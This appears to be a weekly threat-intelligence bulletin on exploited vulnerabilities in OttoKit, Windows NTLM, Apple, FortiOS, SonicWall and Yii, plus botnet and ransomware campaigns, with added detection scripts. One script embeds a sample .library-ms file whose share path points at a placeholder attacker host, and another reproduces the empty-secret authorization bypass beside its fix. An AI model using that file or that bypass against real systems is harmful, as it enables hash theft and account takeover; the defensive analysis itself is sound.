Executive Summary
A wave of active threat activity this week underscores how both legacy flaws and newly surfaced vulnerabilities remain prime targets for exploitation. CISA has added a four-year-old SonicWall SMA100 vulnerability to its KEV catalog, signaling active exploitation despite its age. Apple issued emergency security updates to address two zero-day vulnerabilities leveraged in sophisticated attacks across multiple platforms, including iOS, macOS, tvOS, iPadOS, and visionOS. Meanwhile, Check Point Research uncovered the weaponization of a recently patched NTLM hash disclosure vulnerability in Microsoft Windows, exploited just days post-disclosure. Web application security also remains in the crosshairs, with active exploitation of critical flaws in the OttoKit WordPress plugin and the Yii 2 PHP framework, emphasizing the urgent need for timely patching, threat detection, and continuous monitoring across enterprise environments.
A notable spike in botnet-driven campaigns was observed, with EnemyBot, Sysrv-K, Andoryu, and Androxgh0st leveraging known flaws in Cloud Gateway, GitLab, and PHP applications. At the same time, IoT botnets such as Bashlite, BrickerBot, Tsunami, and Mirai ramped up exploitation efforts, aggressively targeting Eir D1000 modems to expand their botnet infrastructure.
CISA has analyzed the RESURGE malware, which targets Ivanti Connect Secure appliances, offering persistence, credential theft, and privilege escalation. At the same time, Kaspersky exposed Operation ForumTroll, a cyber-espionage campaign exploiting a Google Chrome zero-day to target Russian media and academic sectors. Fortinet also reported a stealthy post-exploitation technique, where attackers used historical zero-days to retain access to compromised devices, even after patching, by leaving behind symbolic links for read-only access to sensitive files. Meanwhile, Cyble uncovered a bold new ransomware variant dubbed DOGE BIG BALLS, delivered via phishing and obfuscated PowerShell, exploiting Intel drivers to achieve kernel-level privilege escalation and stealthy persistence.
As threat actors grow more sophisticated, swift patching, proactive monitoring, and continuous vigilance are essential to staying ahead of both emerging and lingering threats.
Trending / Critical Vulnerabilities
Current trending vulnerabilities offer insights into the latest emerging and widely discussed threats, helping to make informed decisions.
An Authorization Bypass Vulnerability in the OttoKit WordPress plugin (formerly known as SureTriggers) has been identified, allowing attackers to create administrator-level accounts under specific conditions. With a high CVSS Score of 8.1, this flaw affects all versions up to and including 1.0.78. The vulnerability arises from the lack of an empty value check on the secret_key parameter within the authenticate_user() function, enabling unauthorized access if the plugin is installed but not properly configured. The Brainstorm Force development team addressed the issue in version 1.0.79. Alarmingly, the flaw was subjected to active exploitation just hours after its public disclosure, highlighting the urgent need for users to update to the patched version immediately.
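The following is an added illustration of the authorization-bypass logic described above, written in Python from the advisory's description; it is not the plugin's own PHP code, and the function and parameter names are assumptions chosen to match the advisory's wording. It places the flawed check beside a hardened one.

```python
import hmac


def authenticate_user_vulnerable(configured_secret: str, supplied_secret: str) -> bool:
    """Mirrors the flawed logic: a straight equality test with no empty-value guard.
    When the plugin is installed but never configured, the stored secret is still "",
    so a request carrying an empty secret_key passes the check."""
    return supplied_secret == configured_secret


def authenticate_user_fixed(configured_secret: str, supplied_secret: str) -> bool:
    """Hardened form: fail closed on an unconfigured secret or a missing parameter,
    then compare in constant time so the check does not leak timing information."""
    if not configured_secret or not supplied_secret:
        return False
    return hmac.compare_digest(configured_secret.encode(), supplied_secret.encode())


def handle_create_user(configured_secret: str, params: dict, check=authenticate_user_fixed) -> str:
    """Simplified stand-in for the account-creation endpoint (hypothetical, not the
    plugin's code): only an authenticated request may create an account. The `check`
    argument selects which authenticator guards it so both behaviours can be compared."""
    if check(configured_secret, params.get("secret_key", "")):
        return "account created"
    return "rejected"
```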
An NTLM Hash Disclosure Vulnerability in Microsoft Windows enables attackers to leak NTLMv2-SSP hashes via specially crafted .library-ms files. The vulnerability is triggered when a user simply opens the malicious file, causing Windows Explorer to automatically initiate an SMB authentication request to a remote server; beyond that single action, no further user interaction is required for the user's NTLM hash to leak.
The flaw, which impacts all supported versions of Windows, was patched by Microsoft on March 11, 2025. Less than two weeks after disclosure, threat actors began actively exploiting this flaw. According to Check Point, the campaign dubbed "NTLM Exploits Bomb" was detected around March 20–21, 2025 and has targeted both government and private entities in Poland and Romania. Victims received malspam emails containing Dropbox-hosted archives, which, once extracted, triggered NTLM hash leaks to attacker-controlled SMB servers based in Russia, Bulgaria, the Netherlands, Australia, and Turkey. These events highlight the critical need for organizations to apply security patches promptly and monitor outbound authentication traffic to detect and prevent credential leakage through such stealthy exploitation techniques.
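As an added example (not code from Check Point or Microsoft), the script below inspects a .library-ms file and reports any search location that points at a remote host, which is the property that makes Explorer reach out over SMB. The sample file is constructed here and the host name in it is a placeholder, not an indicator from the campaign.

```python
import xml.etree.ElementTree as ET

# Constructed sample in the Windows Library Description format; the host name is a
# placeholder, not an indicator from any real campaign.
SAMPLE_LIBRARY_MS = r"""<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@shell32.dll,-34575</name>
  <version>6</version>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <simpleLocation>
        <url>\\attacker.example.invalid\share</url>
      </simpleLocation>
    </searchConnectorDescription>
    <searchConnectorDescription>
      <simpleLocation>
        <url>C:\Users\Public\Documents</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""


def is_remote_location(url: str) -> bool:
    """True for UNC paths (two leading backslashes or slashes) and smb:// URLs,
    i.e. locations Explorer would reach over SMB and authenticate to."""
    u = url.strip().lower()
    return u.startswith("\\\\") or u.startswith("//") or u.startswith("smb://")


def library_locations(xml_text: str) -> list:
    """Collect every <url> under <simpleLocation>, ignoring the XML namespace."""
    root = ET.fromstring(xml_text)
    urls = []
    for el in root.iter():
        if el.tag.rsplit("}", 1)[-1] == "simpleLocation":
            for child in el:
                if child.tag.rsplit("}", 1)[-1] == "url" and child.text:
                    urls.append(child.text.strip())
    return urls


def remote_locations(xml_text: str) -> list:
    """Locations that would make the viewing host authenticate to a remote server."""
    return [u for u in library_locations(xml_text) if is_remote_location(u)]
```

A library file delivered by e-mail whose locations resolve to hosts outside the organization is a strong signal for quarantine, and the same check complements monitoring of outbound SMB traffic at the perimeter.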
A Memory Corruption Vulnerability has been identified in Apple's Core Audio Framework, which could lead to arbitrary code execution when processing an audio stream embedded in a maliciously crafted media file. This issue affects multiple Apple platforms, including iOS, macOS, tvOS, iPadOS, and visionOS, and carries a high CVSS score of 7.5. Apple confirmed that this flaw has been exploited as a zero-day in the wild as part of a highly sophisticated attack campaign specifically targeting individual iOS users. In response to its in-the-wild exploitation, Apple swiftly released critical security updates across its ecosystem, including iOS and iPadOS 18.4.1, macOS Sequoia 15.4.1, tvOS 18.4.1, and visionOS 2.4.1. Users are strongly urged to update their devices to these patched versions immediately to safeguard against potential compromise.
A Vulnerability in the Remote Procedure Authentication Component (RPAC) of Apple's operating systems could allow an attacker with arbitrary read and write access to bypass Pointer Authentication (PAC), a crucial security mechanism designed to mitigate memory-related exploits in iOS. Apple confirmed that this flaw has been exploited as a zero-day in the wild as part of a highly sophisticated attack campaign specifically targeting individual iOS users. In response, Apple swiftly released critical security updates across its ecosystem, including iOS and iPadOS 18.4.1, macOS Sequoia 15.4.1, tvOS 18.4.1, and visionOS 2.4.1. Considering the confirmed in-the-wild exploitation, users are strongly urged to update their devices to the latest versions to mitigate potential risks.
An Out-of-Bounds Write Vulnerability in Fortinet FortiOS allows remote unauthenticated attackers to execute arbitrary commands through specially crafted HTTPS requests. Recent investigations by Fortinet revealed active exploitation of this flaw by an unknown threat actor to gain unauthorized access to vulnerable FortiGate devices. Historically, this vulnerability has also been weaponized by multiple threat groups, including the state-sponsored Volt Typhoon (to deploy COATHANGER malware), Black Basta ransomware, and the Mirai botnet, demonstrating its persistent value in a wide range of malicious campaigns. In response, Fortinet released security updates for FortiOS versions 7.6.2, 7.4.7, 7.2.11, 7.0.17, and 6.4.16. These updates not only remove the symbolic link used in post-exploitation techniques but also harden the SSL-VPN interface to prevent unauthorized file serving. The incident reinforces the importance of prompt patching and continuous security monitoring to defend against evolving post-exploitation methods.
An Improper Protection of Alternate Path Vulnerability has been identified in the Yii 2 PHP web application framework. With a critical CVSS Score of 9.0, this flaw affects versions prior to 2.0.52 and has been patched in version 2.0.52. Yii 2, a modern and high-performance PHP framework, is designed for developer productivity and application performance, offering sensible default configurations and customizable components for diverse web development needs. The vulnerability is a regression of the previously addressed CVE-2024-4990, tied to the framework's Behavior system, where improperly validated input could allow arbitrary object instantiation through unsafe reflection. Active exploitation of this flaw was observed between February and April 2025, underscoring the urgency for users to update affected installations immediately.
A Heap-Based Buffer Overflow Vulnerability in the SSL-VPN component of Fortinet FortiOS and FortiProxy allows unauthenticated remote attackers to execute arbitrary commands through specially crafted requests. Fortinet’s recent investigation confirmed that this flaw is currently being actively exploited by an unknown threat actor to gain unauthorized access to vulnerable FortiGate devices. Historically, this vulnerability has been leveraged by several advanced threat groups, including Earth Kasha and the state-sponsored Volt Typhoon, to deploy malware such as the NOOPDOOR backdoor and LODEINFO, underscoring its sustained utility in a variety of malicious campaigns. In response, Fortinet released patches for FortiOS versions 7.6.2, 7.4.7, 7.2.11, 7.0.17, and 6.4.16. These updates remove the malicious symbolic link used in post-exploitation activity and reinforce the SSL-VPN interface to prevent further abuse. This incident highlights the ongoing importance of timely patching, proactive threat detection, and layered defenses to combat sophisticated exploitation tactics.
A Heap-Based Buffer Overflow Vulnerability in Fortinet FortiOS allows unauthenticated remote attackers to execute arbitrary commands through specially crafted requests. Fortinet's recent investigation confirmed that this flaw is under active exploitation by an unknown threat actor targeting vulnerable FortiGate devices. Historically, this vulnerability has been weaponized by several advanced threat groups, including UNC3886, Volt Typhoon, and RansomHouse, and has served as a vector for deploying high-profile malware such as the Mirai botnet, COATHANGER, and BOLDMOVE, reflecting its broad appeal across diverse attack campaigns. In response, Fortinet issued patches for FortiOS versions 7.6.2, 7.4.7, 7.2.11, 7.0.17, and 6.4.16. These updates remove the symbolic link used in post-exploitation and harden the SSL-VPN interface to block further misuse. The incident reinforces the critical need for timely security updates, proactive threat detection, and robust defense strategies to stay ahead of evolving attack techniques.
An OS Command Injection Vulnerability affecting the management interface of SonicWall SMA100 Appliances allows a remote authenticated attacker to execute arbitrary commands as the 'nobody' user, potentially leading to code execution. Originally disclosed in 2021, this vulnerability has come under renewed scrutiny due to observed in-the-wild exploitation, prompting SonicWall to update its security advisory and release multiple fixed versions. Following this development, this vulnerability has also been added to the CISA Known Exploited Vulnerabilities (KEV) catalog, further highlighting its current relevance and threat level.
Exploit Activity and Mass Scanning Observed on Cytellite Sensors
Telemetry collected from Loginsoft sensors was analyzed and processed to derive insights into what is actively being exploited and actively being scanned. As a source of truth, source IPv4 addresses and payloads can be provided on a need-to-know basis.
Vulnerabilities abused by Botnet
Identified vulnerabilities exploited by botnets, including recent CVEs logged in MISP. Presented here are the top 5 CVEs with payloads suggestive of botnet activity, such as invoking wget with bare IP addresses.
Vulnerabilities Abused by Malware
We proactively monitor the vulnerabilities that are targeted by adversaries. Each vulnerability is studied by an analyst and mapped to MITRE ATT&CK tactics and techniques. The information is derived from our vulnerability intelligence platform, which collects and curates data from various sources such as Twitter, Telegram, OSINT groups, blogs, data leak sites, and more.
The Cybersecurity and Infrastructure Security Agency (CISA) has released a Malware Analysis Report detailing a new malware variant, RESURGE, linked to the exploitation of CVE-2025-0282 in Ivanti Connect Secure appliances. RESURGE shares functionalities with the SPAWNCHIMERA malware, including persistence across reboots, but introduces unique commands that create web shells, manipulate integrity checks, and modify files. These capabilities enable credential harvesting, unauthorized account creation, password resets, and privilege escalation.
Kaspersky's Global Research and Analysis Team (GReAT) has uncovered a state-sponsored APT attack, dubbed Operation ForumTroll, which exploits a zero-day vulnerability, CVE-2025-2783, in Google Chrome to conduct cyber-espionage against Russian media professionals and academic institutions. The attack begins with phishing emails impersonating invitations to the Primakov Readings forum, containing malicious links that redirect victims to an attacker-controlled website. If a Windows PC user with Google Chrome or any Chromium-based browser clicks the link, malware is deployed automatically, requiring no further action from the victim. The CVE-2025-2783 vulnerability, a logic flaw between Chrome and the Windows operating system, enables a sandbox protection bypass, allowing attackers to execute remote code. Kaspersky reported the flaw to Google, which swiftly released a patch. Given the highly targeted nature of the attack, organizations are urged to immediately apply the latest Chrome security update and strengthen their phishing defenses to mitigate the risk.
Symlink Backdoor targets over 16,000 Fortinet Devices Worldwide
Fortinet has recently uncovered a post-exploitation technique used by an unknown threat actor, actively exploiting known vulnerabilities that were previously patched. This issue, linked to historic exploitation campaigns starting in 2023, involves zero-day vulnerabilities like CVE-2024-21762, CVE-2023-27997 and CVE-2022-42475. The threat actor created a symbolic link between the user and root filesystems within the SSL-VPN language folder, a modification that bypassed detection. Even after patching, this symlink allowed continued read-only access to sensitive files, including configurations, leaving devices vulnerable.
As of April 15, 2025, the Shadowserver Foundation identified 16,620 internet-exposed Fortinet devices compromised by this backdoor, with the majority located in Asia (7,886), followed by Europe (3,766) and North America (3,217). In response, Fortinet released FortiOS updates (7.6.2, 7.4.7, 7.2.11, 7.0.17, 6.4.16) to remove the symbolic link and strengthen SSL-VPN security. This highlights the importance of timely patching and continuous threat monitoring to prevent such exploits.
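As an added example (not Fortinet's code or tooling), the script below walks a directory that should contain only static web content and reports symbolic links whose targets resolve outside it, the class of modification described above. It builds its own constructed directory layout, so the folder names and the stand-in for the root filesystem are assumptions for the demo, not FortiOS paths.

```python
import os
import tempfile
from pathlib import Path


def escaping_symlinks(content_root: str) -> list:
    """Return (link_path, resolved_target) for every symlink under content_root
    whose target lies outside content_root. Dangling links are reported too,
    since resolve(strict=False) still yields the path the link would reach."""
    root = Path(content_root).resolve()
    findings = []
    # followlinks=False: never descend into a linked directory, just report it.
    for dirpath, dirnames, filenames in os.walk(root, followlinks=False):
        for name in dirnames + filenames:
            link = Path(dirpath) / name
            if not link.is_symlink():
                continue
            target = link.resolve(strict=False)
            if target != root and root not in target.parents:
                findings.append((str(link), str(target)))
    return findings


def build_demo_tree() -> str:
    """Constructed layout for the demo: a 'lang' folder holding a benign relative
    link and a link that escapes to a directory standing in for the root filesystem."""
    base = Path(tempfile.mkdtemp())
    lang = base / "lang"
    lang.mkdir()
    (lang / "en.json").write_text("{}")
    os.symlink("en.json", lang / "default.json")  # stays inside lang: benign
    fake_root = base / "fakeroot"
    (fake_root / "data").mkdir(parents=True)
    (fake_root / "data" / "config.conf").write_text("placeholder")
    os.symlink(fake_root, lang / "ja.json")  # escapes lang: this is the finding
    return str(lang)


if __name__ == "__main__":
    for link, target in escaping_symlinks(build_demo_tree()):
        print(f"symlink escapes content root: {link} -> {target}")
```

Running the same check on a known-good copy of the content folder and diffing the results separates vendor-shipped links from planted ones.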
Cyble researchers have uncovered a new ransomware variant named DOGE BIG BALLS, notable not just for its audacious name but also for its sophisticated use of psychological manipulation and technical stealth. The attack begins with a deceptive phishing email containing a ZIP archive titled “Pay Adjustment.zip”, which houses a malicious shortcut file named “Pay Adjustment.pdf.lnk.” When executed, this file launches a series of obfuscated PowerShell commands, triggering a multi-stage infection chain. A critical component of the attack is the exploitation of CVE-2015-2291, a vulnerability in Intel’s Ethernet diagnostics driver (iqvw64e.sys), which allows arbitrary code execution at the kernel level via crafted IOCTL calls. The attacker utilizes a tool called ktool.exe to install the vulnerable driver as a kernel-mode service, granting direct access to kernel memory. This enables the ransomware to inject a SYSTEM process token, escalate privileges, disable security logging, and maintain a stealthy foothold in the system.
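The step in that chain most visible to defenders is the installation of a known-vulnerable driver as a kernel-mode service. As an added example (not Cyble's code), the detection below flags service-installation records that load a driver on a watchlist or load any kernel driver from outside the Windows drivers directory. The records are constructed in a flattened key=value form mirroring the fields of a System log Event ID 7045 entry; the field names and the ktool-style paths are assumptions for the demo.

```python
import re

# Drivers known to be abused for kernel access; iqvw64e.sys is the one in this campaign.
VULNERABLE_DRIVERS = {"iqvw64e.sys"}

# Constructed records (not real telemetry) in a flattened key=value form.
SAMPLE_EVENTS = [
    r'EventID=7045 ServiceName=iqvw64e ImagePath="C:\Users\Public\iqvw64e.sys" ServiceType="kernel mode driver" StartType="demand start"',
    r'EventID=7045 ServiceName=tcpip ImagePath="\SystemRoot\System32\drivers\tcpip.sys" ServiceType="kernel mode driver" StartType="boot start"',
    r'EventID=7045 ServiceName=updsvc ImagePath="C:\Program Files\Vendor\upd.exe" ServiceType="user mode service" StartType="auto start"',
    r'EventID=7045 ServiceName=drvtmp ImagePath="C:\Windows\Temp\helper.sys" ServiceType="kernel mode driver" StartType="demand start"',
]

KV = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_event(line: str) -> dict:
    """Split a flattened record into a dict, dropping the quotes around values."""
    return {k: v.strip('"') for k, v in KV.findall(line)}


def assess(event: dict) -> list:
    """Return the reasons a kernel-driver installation deserves a look (empty if none)."""
    if event.get("EventID") != "7045":
        return []
    if event.get("ServiceType", "").lower() != "kernel mode driver":
        return []
    path = event.get("ImagePath", "").lower()
    driver = path.rsplit("\\", 1)[-1]
    reasons = []
    if driver in VULNERABLE_DRIVERS:
        reasons.append(f"known-vulnerable driver {driver} installed as a service")
    if "\\system32\\drivers\\" not in path:
        reasons.append(f"kernel driver loaded from outside the drivers directory: {path}")
    return reasons


def scan(lines) -> list:
    """(ServiceName, reasons) for every record that triggered at least one reason."""
    findings = []
    for line in lines:
        event = parse_event(line)
        reasons = assess(event)
        if reasons:
            findings.append((event.get("ServiceName", "?"), reasons))
    return findings
```

The watchlist is intentionally a set so it can be fed from a maintained vulnerable-driver list rather than the single name taken from this report.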
PRE-NVD observed for this week
PRE-NVD refers to vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts, with plans to expand.
External References
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24054
- https://research.checkpoint.com/2025/cve-2025-24054-ntlm-exploit-in-the-wild/
- https://www.bleepingcomputer.com/news/security/over-16-000-fortinet-devices-compromised-with-symlink-backdoor/
- https://www.cisa.gov/news-events/alerts/2025/04/16/cisa-adds-one-known-exploited-vulnerability-catalog
- https://www.fortinet.com/blog/psirt-blogs/analysis-of-threat-actor-activity
- https://www.wordfence.com/blog/2025/04/100000-wordpress-sites-affected-by-administrative-user-creation-vulnerability-in-suretriggers-wordpress-plugin/
- https://www.yiiframework.com/news/709/please-upgrade-to-yii-2-0-52
- https://www.cisa.gov/news-events/alerts/2025/03/28/cisa-releases-malware-analysis-report-resurge-malware-associated-ivanti-connect-secure
- https://www.kaspersky.co.in/blog/forum-troll-apt-with-zero-day-vulnerability/28692/